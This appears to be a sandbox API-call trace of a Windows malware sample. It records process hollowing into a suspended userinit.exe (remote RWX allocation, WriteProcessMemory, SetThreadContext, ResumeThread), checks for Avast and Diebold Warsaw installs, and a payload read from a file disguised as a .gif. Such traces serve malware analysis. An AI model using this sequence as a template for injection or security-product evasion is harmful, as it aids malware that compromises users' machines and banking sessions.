[0259.751] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0259.751] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.752] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.752] GlobalUnlock (hMem=0x95000c) returned 0
[0259.752] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0259.752] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.753] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.753] GlobalUnlock (hMem=0x95000c) returned 0
[0259.753] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0259.753] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.754] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.754] GlobalUnlock (hMem=0x95000c) returned 0
[0259.754] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0259.754] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.754] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.754] GlobalUnlock (hMem=0x95000c) returned 0
[0259.754] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0259.754] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.755] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.755] GlobalUnlock (hMem=0x95000c) returned 0
[0259.755] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0259.755] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.756] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.756] GlobalUnlock (hMem=0x95000c) returned 0
[0259.756] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0259.756] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.757] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.757] GlobalUnlock (hMem=0x95000c) returned 0
[0259.757] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0259.757] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.757] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.757] GlobalUnlock (hMem=0x95000c) returned 0
[0259.757] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0259.757] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.758] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.758] GlobalUnlock (hMem=0x95000c) returned 0
[0259.758] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0259.758] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.759] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x16c, hThread=0x170, dwProcessId=0xaf0, dwThreadId=0xaf8)) returned 1
[0259.762] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0259.762] GetThreadContext (in: hThread=0x170, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x292be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1afa70, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0259.763] ReadProcessMemory (in: hProcess=0x16c, lpBaseAddress=0x7ffde008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0259.763] VirtualAllocEx (hProcess=0x16c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0259.763] VirtualAlloc (lpAddress=0x1e24000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e24000
[0259.768] WriteProcessMemory (in: hProcess=0x16c, lpBaseAddress=0x400000, lpBuffer=0x1e22aa0*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1e22aa0*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0259.779] WriteProcessMemory (in: hProcess=0x16c, lpBaseAddress=0x7ffde008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0259.779] SetThreadContext (hThread=0x170, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x1afa70, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0259.779] ResumeThread (hThread=0x170) returned 0x1
[0259.779] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0259.779] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.779] GlobalUnlock (hMem=0x95000c) returned 0
[0259.780] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0259.780] GlobalUnlock (hMem=0x950004) returned 0
[0259.786] Sleep (dwMilliseconds=0xe74e)
[0269.795] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0269.796] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0269.796] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0269.796] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0269.796] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178
[0269.796] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0269.796] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0269.796] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0269.796] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0269.798] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0269.798] ReadFile (in: hFile=0x178, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0269.806] CloseHandle (hObject=0x178) returned 1
[0269.806] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.807] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.807] GlobalUnlock (hMem=0x95000c) returned 0
[0269.807] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0269.807] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0269.808] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.808] GlobalUnlock (hMem=0x95000c) returned 0
[0269.808] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0269.809] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0269.810] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0269.810] GlobalUnlock (hMem=0x95000c) returned 0
[0269.810] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0269.810] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0269.811] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0269.811] GlobalUnlock (hMem=0x95000c) returned 0
[0269.811] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0269.811] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0269.812] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0269.812] GlobalUnlock (hMem=0x95000c) returned 0
[0269.812] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
